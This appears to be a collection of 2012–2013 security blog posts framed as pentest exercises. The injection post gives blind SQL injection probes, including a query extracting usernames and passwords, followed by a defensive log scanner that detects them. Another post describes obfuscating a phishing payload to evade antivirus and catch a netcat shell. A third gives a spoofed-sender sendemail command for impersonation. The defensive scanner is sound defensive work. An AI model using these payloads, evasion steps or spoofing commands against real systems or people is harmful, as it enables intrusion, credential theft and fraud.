Thursday 18 July 2013

THE LIFE OF AN INJECTION

[<MEGAPRIMER 1.0.7> LESS IS MORE <GREP> MYSQL>BLIND SQL INJECTION]

Going Blind and finding your way
An assignment is requested as follows. You are required to conduct a pentest on a client's simulated Research and Development lab environment. While being debriefed, you get to interact with the network administrator, who happens to be a Cisco Expert and Snort Certified Professional and who has set up the militarized test environment with state-of-the-art security defense mechanisms. Moreover, you get to know that they recently installed a web-based firewall. You are required to compromise the installation so as to enable the organisation to secure itself against future risk exposures.
Deliverable: Own the BOX
ssvforensic labs: Tool Kit for this operation, not limited to:
  • Case: Undisclosed company Y
  • 411 about the firm: ERP Software Development
  • Mission: Pita_Katikati_Yao
  • Objective: Pawn and Own
  • RV choice: Kali Linux [Burp Suite/Zap, SQL cheat-sheet, WebShell, Hosting, Tcpdump & FireBug]
  • POC: Samples below

SAMPLE OF THE THEORETICAL POC METHODOLOGY
The tactics and strategies used by a Shaolin disciple during combat are the intelligent application of principles generalized by some of the best warriors of the past.
This is synonymous with **Ancient Principles for Future Battlefields**, the BackTrack mantra. The below can be summarised as the 5 rules of thumb for any white hat, black hat or grey hat, not forgetting our Red Hat buddies from 0days ago; the Oracle is listening...

RULES OF THUMB

  1. Signal to the East, strike to the West;
  2. Avoid an opponent's strong points, strike the weak ones;
  3. Trick an opponent into advancing without success;
  4. If an opponent is strong, enter from the side; if weak, enter from the front;
  5. USE MINIMUM FORCE to neutralize maximum strength.
Layered defence approach adopted versus a potential threat via SQL injection (figure in the original post).

SAMPLE OF THE THEORETICAL SETUP METHODOLOGY
After carefully assessing (Rules No 2 & 4), going for the web server was more logical than the other options, which were highly monitored. Now, to fool the technical team monitoring the systems, we install four custom VM setups (we only discuss two, for reasons known to us): one that is host-based and the other with a "custom virtual network", to be used as a decoy when running the automated scan using nmap. We also deliberately fail to stop nmap from doing a stealth scan, and we set -p to 1-65500, the aim being that we need the administrators to pay more attention to the IPS and IDS (Rule No 1). We also create a cron job for our bash script on one of the VMs to loop other scans as well as nmap (Rule No 3).
SAMPLE OF THE BLIND SQL INJECTION POC
Using Rule No 5, a sample of the blind SQL injections used to own the box.
http://xxxxxxxxxxx/and 1=1
  and 1=2 <--- Boolean false
  and 1=1 <--- Boolean true; the page loads
The MySQL version is 5. To get the version in a blind attack we use substring():
http://xxxxxxxxxxx/and substring(@@version,1,1)=5
To get database tables and columns we use limit 0,1:
http://xxxxxxxxxxx/and (select 1 from mysql.table limit 0,1)=1
Our query here returns 1 row of data, since the sub-select returns only 1 row.
We now use the above method to continuously get more tables and columns.
Pulling characters from the users table:
ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
When > 0 returns false we know that we have reached the end. We later use the ASCII converter to know what the strings are and come up with the letters.
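From the defender's side of the same engagement, here is an added example (my own code, not from the original post) of a small log scanner that flags the probe sequence shown above in web server access logs and counts probes per client, since blind extraction needs one request per character. The log lines, the item.php path and the signature names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access log (not real traffic): 203.0.113.9 runs the post's probe sequence against a hypothetical item.php.
SAMPLE_LOG = """\
203.0.113.9 - - [18/Jul/2013:10:00:01 +0000] "GET /item.php?id=5 HTTP/1.1" 200 1843
203.0.113.9 - - [18/Jul/2013:10:00:02 +0000] "GET /item.php?id=5+and+1=1 HTTP/1.1" 200 1843
203.0.113.9 - - [18/Jul/2013:10:00:03 +0000] "GET /item.php?id=5+and+1=2 HTTP/1.1" 200 512
203.0.113.9 - - [18/Jul/2013:10:00:04 +0000] "GET /item.php?id=5+and+substring(@@version,1,1)=5 HTTP/1.1" 200 1843
203.0.113.9 - - [18/Jul/2013:10:00:05 +0000] "GET /item.php?id=5+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+users+limit+0,1),1,1))>80 HTTP/1.1" 200 1843
198.51.100.7 - - [18/Jul/2013:10:00:06 +0000] "GET /about.html HTTP/1.1" 200 2201
"""

# Common Log Format: client, identd, user, [timestamp], "method uri proto", status, bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Signature names are my own labels (not from any IDS ruleset); each matches one
# probe shape used in the post, checked after URL decoding.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "version_probe": re.compile(r"substring\s*\(\s*@@version", re.I),
    "char_extraction": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),
    "subselect_limit": re.compile(r"\(\s*select\b.*\blimit\s+\d+\s*,\s*\d+", re.I),
}

def classify_uri(raw_uri):
    """Return the names of every signature matching the URL-decoded request URI."""
    uri = unquote_plus(raw_uri)
    return [name for name, rx in SIGNATURES.items() if rx.search(uri)]

def scan_access_log(lines):
    """Return (client_ip, status, [signatures]) for each request that looks like a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole scan
        ip, _method, uri, status = m.groups()
        tags = classify_uri(uri)
        if tags:
            hits.append((ip, int(status), tags))
    return hits

def suspicious_clients(lines, threshold=3):
    """Blind extraction costs one request per character (or bit), so a client that
    reaches the threshold is worth an alert; returns {client_ip: probe_count}."""
    counts = {}
    for ip, _status, _tags in scan_access_log(lines):
        counts[ip] = counts.get(ip, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

The differing response sizes on the 1=1 and 1=2 requests (1843 vs 512 bytes in the sample) are the same boolean oracle the attacker reads, so correlating body size with the flagged requests is a cheap second signal.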

Conclusions
According to the OWASP Top 10 2013, injections are the number one threat facing systems. Below is an illustration of injections and their impact on the business (figure in the original post).

For security analysts and penetration testers, OWASP has provided a framework as a baseline for testing, to help developers, testers and application security specialists understand how to efficiently and effectively test the security of web applications. For more info, click here.
For application pentesters wanting to get their hands dirty, try Mutillidae and Burp Suite as your test environment, and the rest, as they say, is history. I wish to remind you that, as a security analyst, you should seek to provide an acceptable level of security for your client by emphasizing that the word "secure" does not exist in our current world.
Special thanks: credits for reference to OWASP & Sun Tzu (Art of War), my de facto mentor.

Friday 5 July 2013

Recruitment of Hackers

[<MEGAPRIMER 1.0.6.1> FRAUD <B>FRAUD RECRUITMENT>HACKER RECRUITMENT]
Getting a Job as a Hacker
An assignment is requested as follows: Recently, multiple government sites in a certain region of our world have been victims of defacing and DDoS. It is your job to first understand how this online gang operates, with a view to infiltrating and dismantling the group. The C-level in organisation X needs an executive summary on how recruitment is carried out by these gangs and a rationale for what motivates this kind of illegal group.
Deliverable: Explain how hackers are recruited in the black market.
ssvforensic labs: Tool Kit for this operation, not limited to:
  • Case: Undisclosed X company
  • 411 about the firm: Private Contractor
  • Mission: home_and_away
  • Objective: Underground Recruitment of Hackers
  • RV choice: Kali Linux [Maltego Casefile, Graph Search, IRC, Twitter, socialNet, GREP, Google]
  • POC: Sample below
Sample of POC on how these three elements aid in the recruitment process
For fraud to take place, 3 elements have to be present:
1. Rationalization >> 2. Perceived opportunity >> 3. Perceived pressure.
In order to understand this phenomenon, three rationales can be used:
1. Zero-order reasoning >> 2. First-order reasoning >> 3. Higher-order reasoning. Our discussion is limited to first-order reasoning, in which we are considering the conditions that directly affect the hacker. To do that, let's consider this with a visual aid.
With hackers, the greater the perceived opportunity or the more intense the pressure (mostly financial, or vice), the less rationalization it takes to motivate someone to commit fraud. Likewise, the more dishonest a perpetrator is, the less opportunity and/or pressure it takes to motivate fraud. It must be understood that hacking, in any of its forms, is fraud.
SAMPLE OF THE POC ON RECRUITMENT

How are the organisation and leadership of any hackers or hacking legions created? Power is the single most important element that catalyses the organisation and recruitment of any hacking entity. How?

In 1947, Max Weber introduced power as the probability that a person can carry out his or her own will despite resistance. When a hack takes place, the conspirator has the desire to carry out his or her own will, to influence another person to act and do as the perpetrator wishes, regardless of resistance. Consider the below diagram on the recruitment process of hacktivist groups (figure in the original post).
The effectiveness of the perpetrator in influencing the potential recruit depends upon the susceptibility of the victim as well as the perpetrator's ability to manipulate the various types of power. The figure is interactive, meaning that the more susceptible a victim is to the various types of power, the less effective the perpetrator has to be for recruitment to occur. Often, after the initial victim is recruited into the fraud scheme, that individual will then become a conspirator (in position A) and begin to influence other individuals to participate in the fraud.
Conclusions
In conclusion, as a security analyst, it is important to understand that fraud examination provides insights into the likelihood of hacking activities. As a security consultant, it is prudent to know who you are dealing with and how to set up countermeasures to mitigate security-related issues. A mere pentest only serves to inform your client of vulnerabilities, but remember that risk assessment by any standard, be it COBIT, COSO, NIST or ISO, is a 4- to 6-tier process model. To my fellow security analysts, the Olympics are over, so stop playing around and let us do good work.
Special thanks: credits to Prof. XYZ (Risk Analysis) & Sun Tzu (Art of War), my de facto mentor.

Fraud As A Service

[<MEGAPRIMER 1.0.6> FRAUD <A>SOCIAL ENGINEERING> SPEAR PHISHING]
Committing Fraud using Social Engineering
An assignment is requested as follows: Conduct a risk assessment using passive, non-intrusive means and gain access to a Fortune 500 company in one week, so as to address the risk posed by fraud in a corporate environment.
Deliverable: Use theoretical and technical non-intrusive means in your POC.
Sample of how the problem was solved
Fraud is defined as the multifarious means which human ingenuity can devise, which are resorted to by one individual to get an advantage over another by false representations.
For fraud to happen, 3 elements have to be present:
1. Rationalization >> 2. Perceived opportunity >> 3. Perceived pressure
Fraudsters, aka hackers, will use systematic social engineering as per below.
ssvforensic labs: The tool Kit for this operation, not limited to:
Use passive, non-intrusive means to gain access and leave no stone unturned.
  • Case: Fortune 500 company
  • 411 about the firm: Fortune worth in excess of 2 billion dollars
  • Mission: Charles_Ponzi
  • Objective: Impact of pseudo-frauds with the advent of Fraud-as-a-Service (FaaS)
  • RV choice: Kali Linux [Maltego, rapportive, facebook, Total AV, rootkit, jigsaw, glassdoor]
  • POC: Below
Sample theoretical principle on fraud in relation to social engineering (figure in the original post)

Sample of the technical detail using phishing techniques
The payload is encrypted with shikata_ga_nai, obfuscated 100 times.
This did not work due to the latest signature-based proactive defence technologies. We later use PEScrambler and other undisclosed tools to encrypt it further so as to bypass vendor-based AV signatures. PEScrambler is a tool that obfuscates Win32 binaries automatically. It can relocate portions of code and protect them with anti-disassembly code. It also defeats static program-flow analysis by re-routing all function calls through a central dispatcher function. We finally use TotalAV to perform a malware net scan, which yields a detection ratio of 0:47 against major antivirus scanners, which is desirable. None of the top vendors' signatures is able to detect the malicious PDF.
Finally, use the transporter [sendmail] to send the package and hope netcat listens to something nice from your multi-handler; 7 out of 10 times it will, as shown below.
In conclusion, information is the new money. Fraud-as-a-Service (FaaS) is an organised scheme used by techno-savvy fraudsters to embezzle billions from companies. The three affected elements of non-cash frauds are a) inventory, b) securities and c) information.

Thursday 26 April 2012

[<MEGAPRIMER 1.0.5>Maltego<G>FORENSICS>DIGITAL ANTI-FORENSICS]
DIGITAL ANTI-FORENSICS:TRUECRYPT

Ensuring a secure state for forensics requires digital anti-forensic tools that can secure or hide your data (steganography). The tool to do the job in BT5R2 is TrueCrypt.
TrueCrypt is FOSS (Free and Open Source Software): open-source disk encryption software that can be used to encrypt data and volumes securely with a password.
What are the main features of TrueCrypt?
  1. Creates a virtual encrypted disk within a file and mounts it as a real disk.
  2. Encrypts an entire partition or storage device such as a USB flash drive or hard drive.
  3. Encryption is automatic, real-time (on-the-fly) and transparent.
  4. Parallelization and pipelining allow data to be read and written as fast as if the drive were not encrypted.
  5. Encryption can be hardware-accelerated on modern processors.
  6. Provides plausible deniability in case an adversary forces you to reveal the password: hidden volume (steganography) and hidden operating system.
Supported Operating Systems:

  • Windows 7  (32-bit and 64-bit)
  • Windows Vista
  • Windows Vista x64 (64-bit) Edition
  • Windows XP
  • Windows XP x64 (64-bit) Edition
  • Windows Server 2008 R2 (64-bit)
  • Windows Server 2008
  • Windows Server 2008 x64 (64-bit)
  • Windows Server 2003
  • Windows Server 2003 x64 (64-bit)
  • Windows 2000 SP4
  • Mac OS X 10.7 Lion  (64-bit and 32-bit)
  • Mac OS X 10.6 Snow Leopard  (32-bit)
  • Mac OS X 10.5 Leopard
  • Mac OS X 10.4 Tiger
  • Linux (32-bit and 64-bit versions, kernel 2.6 or compatible)
Further reading (links in the original post):
  • Encryption algorithms supported
  • Download TrueCrypt
  • Beginner tutorials on using TrueCrypt
Setting up TrueCrypt on BackTrack 5 R2
Navigate: Backtrack > Forensics > Digital Anti Forensics > Truecrypt
To open the volume (screenshots in the original post):

Voila!!! Adios

Wednesday 25 April 2012


[<MEGAPRIMER 1.0.4.3>Maltego<G>ENUMERATION>INFORMATION GATHERING] LOCK DOWN: DISSECTING WITH MALTEGO LIKE SCIENCE
Maltego tools can be used by security researchers and law enforcement for:
  • Corporates: business intelligence, risk management and assessment.
  • Students: research and development, class term papers, projects, assignments.
  • Security firms: background checks, social network analysis, threat agent connection analysis.
ssvforensic labs:
1% of information broadcasted on TV leaks 99% of her online information
  • Case: Mali, a drama soap that airs on NTV
  • 411 about the show: Sooo Kenyan, as in "United by Blood : Divided by Greed"
  • Mission: lock_down_msupa
  • Objective: Info gathering, social network analysis, etc.
  • RV choice: BT5 R2 powered by Maltego 3.1.0
  • POC: Below
Used the Phrase transform (Maltego graphs in the original post).

SSVFORENSICS:
  1. The subject at hand has revealed more information about herself and her social network.
  2. Social engineering with other tools like sendemail, to impersonate the subject, can be used by a hacker to further pwn the subject by sending mail with fake headers, i.e. sendemail -t person@email.com -f anonymous@email.com -s mail.nx.net -u (engineered subject of message) -m (social-engineered mail message).
  3. Finding, profiling and influencing individuals or groups is viable.
  4. Data mining and intelligence are clearly free and open source for law enforcement.
  5. In conclusion of this megaprimer, Maltego is undoubtedly a tool in a league of its own.

Tuesday 24 April 2012

[<MEGAPRIMER 1.0.4.2>Maltego<G>ENUMERATION>INFORMATION GATHERING]
ENUMERATING DIGITAL ASSETS
INFRASTRUCTURE / PERSONA & SOCIAL NETWORK (figure in the original post)
Maltego makes it easy to enumerate almost any digital information about an asset: from personal and social network information to devices, digital metadata, passive penetration testing of installations and GPS zoning of infrastructure, among others. The transforms are able to give away valuable information to both the pentester and the hacker.


Web enumeration: Resolve a web address to an IP, or further resolve open ports or domains.

Email enumeration: Resolve an email address to related email addresses and domains.
Phone enumeration: Resolve a telephone number to URLs, email addresses and websites.

Enumerate aliases: John Doe is no longer a mystery. Who is this Wanjohi guy?? I know, do you?

Ssvforensics: Pareto Rules
Information mined is 10% revealing and 90% freely available; if information is power, then?
  1. Are organisations and individuals aware of the risk that any digital information poses to them?
  2. How private and secure are you? For 90% of businesses, 10% of their information is online!
  3. Digital privacy regulations seem to be null and void!! 10% might be private, while 90% is?!!!
  4. 90% of firms are prone to hacking, while 10% of online users are prone to social engineering.
  5. 10% of systems administrators are aware of the 90% risk that their infrastructure poses.
  6. Genius is 10% inspiration and 90% perspiration .... Albert Einstein. Read between my lines ..

Tuesday 17 April 2012


[<MEGAPRIMER 1.0.4.1>Maltego<G>ENUMERATION>INFORMATION GATHERING]
Setup and register Maltego 3.1 Community on BT5R2
Navigate: Applications > Backtrack > Information Gathering > Network Analysis > DNS Analysis > Maltego
Proceed to register a Maltego community account, then log in to use Maltego.
Maltego community client registration page (screenshot in the original post)
Use the login credentials to finish registration below.
Click on the new page icon to start an investigation.
With everything set up, we are ready to proceed in carrying out forensic investigations using Maltego.

Continuation of this megaprimer in the next post:
  • Investigating real-life assets, managing and organizing them

Disclaimer
Obtain advance express permission from the owner or maintainer of the appliance
before searching it with any automated tool, for various legal and moral reasons.
Maltego 3.1 for Backtrack is for demo purposes ONLY.
Ssvforensic is not liable for what you do with this tool or information.